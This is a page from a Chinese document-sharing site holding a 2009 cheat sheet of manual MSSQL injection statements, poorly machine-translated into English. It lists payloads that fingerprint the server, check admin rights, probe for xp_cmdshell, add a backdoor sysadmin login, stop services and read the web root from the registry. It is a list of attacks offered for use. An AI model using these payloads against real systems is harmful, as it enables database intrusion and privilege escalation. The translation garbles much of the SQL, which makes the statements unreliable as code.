原创力文档- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
手工mssql注入常用sql语句(Manual MSSQL injection commonly used SQL statement)
手工mssql注入常用sql语句(Manual MSSQL injection commonly used SQL statement)
Manual MSSQL injection commonly used SQL statement
Reading: 195 time: 2009-8-19 6:43:01 finishing: China black League
------------------------------------------------------------------
And exists (select * from / sysobjects) to determine whether it is MSSQL
And exists (select * from tableName) to determine whether there is..tableName A / / table table name
And 1= (select @@VERSION) //MSSQL version
And 1= (select) (db_name) / current database name
And 1= (select @@servername) / / local service name
And 1= (select IS_SRVROLEMEMBER (sysadmin)) / / to determine whether the system administrator
And 1= (Select IS_MEMBER (db_owner)) / / to determine whether the library authority
And 1= (Select HAS_DBACCESS (Master)) to determine whether there is a library / / read permission
And 1= (select name from master.dbo.sysdatabases where dbid=1 DBID) / / Mancang was 1, 2, 3....
Declare @d int; / / support multiple lines
And 1= (Select count FROM master.dbo.sysobjects (*) Where xtype =XAND name =xp_cmdshell / XP_CMDSHELL) to determine whether there
And 1= (select count FROM master.dbo.sysobjects where name= (*)xp_regread/ / XP_regread) to view the extended stored procedure is not already deleted
Add and remove a SA permission user test: (need SA permission)
Exec, master.dbo.sp_addlogin, test, password
Exec, master.dbo.sp_addsrvrolemember, test, sysadmin
Stop or activate a service. (requires SA permissions)
Exec, master..Xp_servicecontrol,stop,schedule
Exec, master..Xp_servicecontrol,start,schedule
Web site directory
Create, table, labeng (Lala, nvarchar (255), ID, int)
DECLARE @result varchar (255) EXEC master.dbo.xp_regreadHKEY_LOCAL_MACHINE,SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots, @result output insert into , labeng (Lala) values (@result);
And 1= (select top 1 from labeng Lala) or and 1= (select count (*) from, labeng, where, lala1)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
您可能关注的文档
- 徕卡tca机载大坝变形监测软件的开发与应用(Development and application of Leica TCA airborne dam deformation monitoring software).doc
- 循环再生产业的价值形成与实现机制(Value formation and implementation mechanism of recycling industry).doc
- 循环经济(circular economy).doc
- 循环队列的基本操作(The basic operation of a circular queue).doc
- 微信的商业模式与创业机会(WeChat's business models and entrepreneurial opportunities).doc
- 微博舆论(Micro-blog consensus).doc
- 微商陷入困境,社交电商前途迷茫(Micro quotient into trouble, the future of social electricity supplier confused).doc
- 微信朋友圈,是客厅还是围城(WeChat's circle of friends, living room or besieged city).doc
- 徐淑英中国管理研究企业培训应有本土特征(Xu Shuying China's management research, enterprise training should have local characteristics).doc
- 微机原理_在线作业_b(The principle of microcomputer _ online operation _b).doc
- 中国国家标准 GB 14287.5-2025电气火灾监控系统 第5部分:测量热解粒子式电气火灾监控探测器.pdf
- 《GB/T 42706.4-2025电子元器件 半导体器件长期贮存 第4部分:贮存》.pdf
- GB/T 42706.4-2025电子元器件 半导体器件长期贮存 第4部分:贮存.pdf
- 中国国家标准 GB/T 42706.4-2025电子元器件 半导体器件长期贮存 第4部分:贮存.pdf
- 中国国家标准 GB/T 19436.2-2025机械电气安全 电敏保护设备 第2部分:使用有源光电保护装置(AOPDs)设备的特殊要求.pdf
- 《GB/T 19436.2-2025机械电气安全 电敏保护设备 第2部分:使用有源光电保护装置(AOPDs)设备的特殊要求》.pdf
- 《GB 27898.4-2025固定消防给水设备 第4部分:消防气体顶压给水设备》.pdf
- GB 27898.4-2025固定消防给水设备 第4部分:消防气体顶压给水设备.pdf
- GB/T 31270.1-2025化学农药环境安全评价试验准则 第1部分:土壤代谢试验.pdf
- 中国国家标准 GB/T 31270.1-2025化学农药环境安全评价试验准则 第1部分:土壤代谢试验.pdf
文档评论(0)